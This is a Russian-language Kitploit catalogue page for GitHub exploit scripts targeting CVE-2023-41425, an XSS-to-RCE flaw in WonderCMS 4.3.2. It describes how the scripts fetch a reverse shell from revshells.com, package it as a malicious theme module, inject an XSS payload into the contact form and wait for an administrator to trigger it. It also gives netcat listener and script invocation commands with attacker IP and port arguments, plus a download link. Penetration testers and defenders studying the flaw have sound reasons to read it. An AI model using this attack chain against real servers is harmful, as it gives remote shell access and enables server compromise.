Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
Инструменты/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
Генерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного Доступа
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

Репозиторий
31 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

WonderCMS 4.3.2 — эксплойты XSS to RCE

Обзор

Данные скрипты эксплуатируют уязвимость межсайтового скриптинга (XSS) в WonderCMS 4.3.2 для достижения удалённого выполнения кода (RCE). XSS-полезная нагрузка при срабатывании у администратора автоматически устанавливает обратную оболочку на целевой сервер с помощью сфабрикованного вредоносного модуля темы. Обратная оболочка загружается с revshells.com и выполняется, предоставляя атакующему удалённый доступ к серверу.


Содержание

  • Предварительные требования
  • Скрипт 1: автоматический эксплойт
    • Возможности
    • Использование
  • Скрипт 2: ручной эксплойт
    • Возможности
  • Использование
  • Примечания
  • Лицензия

  • Предварительные требования

    Для успешного запуска любого из скриптов необходимы следующие инструменты и условия:

    1. Bash-оболочка: оба скрипта написаны для Linux-окружений с использованием Bash.
    2. netcat (nc): используется для прослушивания соединения обратной оболочки.
    3. Python3: простой HTTP-сервер на Python используется для размещения XSS-нагрузки.
    4. WonderCMS 4.3.2: целевая система должна работать под управлением уязвимой версии WonderCMS.
    5. Взаимодействие администратора: нагрузка требует, чтобы администратор инициировал XSS, что приводит к выполнению обратной оболочки.
    6. revshells.com: полезная нагрузка обратной оболочки динамически загружается с revshells.com.

    Скрипт 1: автоматический эксплойт

    POC

    Pasted image 20241010021603

    Возможности

    Данная версия эксплойта автоматически проверяет активность слушателя nc, загружает обратную оболочку, запускает HTTP-сервер, отправляет нагрузку и ожидает, когда администратор инициирует обратную оболочку.

    • Автоматическая настройка обратной оболочки: загружает предварительно сгенерированную обратную оболочку с revshells.com.
    • Внедрение XSS-нагрузки: внедряет XSS-нагрузку в контактную форму цели.
    • Управление HTTP-сервером: автоматически запускает HTTP-сервер на Python для размещения полезной нагрузки обратной оболочки.
    • Проверка слушателя nc: убеждается, что слушатель запущен, прежде чем продолжить.
    • Автоматическая отправка нагрузки: отправляет нагрузку автоматически без взаимодействия с пользователем.

    Использование

    1. Убедитесь, что слушатель nc запущен на указанном порту:
      root@kitploit:~
      nc -nvlp <PORT>
      
    2. Запустите скрипт следующей командой:
      root@kitploit:~
      ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
      
      Пример:
      root@kitploit:~
      ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
      

    Последовательность действий

    1. Загрузка обратной оболочки: скрипт загружает обратную оболочку с revshells.com.
    2. Изменение обратной оболочки: скрипт обновляется с IP-адресом и портом атакующего.
    3. Создание ZIP-нагрузки: создаётся ZIP-файл, содержащий обратную оболочку.
    4. Формирование XSS-нагрузки: генерируется XSS-нагрузка, устанавливающая обратную оболочку, и внедряется в уязвимую контактную форму.
    5. Автозапуск HTTP-сервера: скрипт запускает HTTP-сервер на Python для обслуживания вредоносной нагрузки.
    6. Автоматическая отправка нагрузки: XSS-нагрузка автоматически отправляется администратору.

    Скрипт 2: ручной эксплойт

    POC

    Pasted image 20241010013048

    Используйте эксплойт, предоставленный скриптом, в поле «Website»…

    Pasted image 20241010013218

    Возможности

    Эта версия требует, чтобы пользователь вручную управлял слушателем nc и инициировал XSS-нагрузку. Она больше подходит для сценариев, где автоматические процессы нежелательны.

    • Ручная настройка обратной оболочки: пользователь отвечает за запуск слушателя.
    • Ручное инициирование XSS: скрипт предоставляет вредоносную ссылку для отправки администратору, но нагрузка должна быть инициирована вручную.
    • Управление HTTP-сервером: запускает HTTP-сервер на Python для размещения XSS-нагрузки.

    Использование

    1. Убедитесь, что слушатель nc запущен на указанном порту:
      root@kitploit:~
      nc -nvlp <PORT>
      
    2. Запустите скрипт следующей командой:
      root@kitploit:~
      ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
      
      Пример:
      root@kitploit:~
      ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
      

    Последовательность действий

    1. Загрузка обратной оболочки: загружает обратную оболочку с revshells.com.
    2. Изменение обратной оболочки: обновляет обратную оболочку с IP-адресом и портом атакующего.
    3. Создание ZIP-нагрузки: создаёт ZIP-файл, содержащий обратную оболочку.
    4. Формирование XSS-нагрузки: генерирует XSS-нагрузку, которая устанавливает обратную оболочку.
    5. Отображение вредоносной ссылки: показывает ссылку, которую необходимо отправить администратору для инициирования.
    6. Запуск HTTP-сервера: запускает HTTP-сервер на Python для размещения нагрузки.

    Примечания

    • Взаимодействие администратора: оба эксплойта полагаются на то, что администратор WonderCMS инициирует XSS-нагрузку, посетив уязвимую страницу. После срабатывания устанавливается обратная оболочка с машиной атакующего.
    • Firewall/IDS/IPS: соблюдайте осторожность при запуске этих эксплойтов в средах, защищённых межсетевыми экранами или системами обнаружения вторжений (IDS), которые могут блокировать подозрительную активность или выдавать предупреждения.
    • Ответственное раскрытие: если вы обнаружите, что цель уязвима, всегда следуйте этическим рекомендациям и сообщайте об уязвимости соответствующим сторонам.
    Скачать инструмент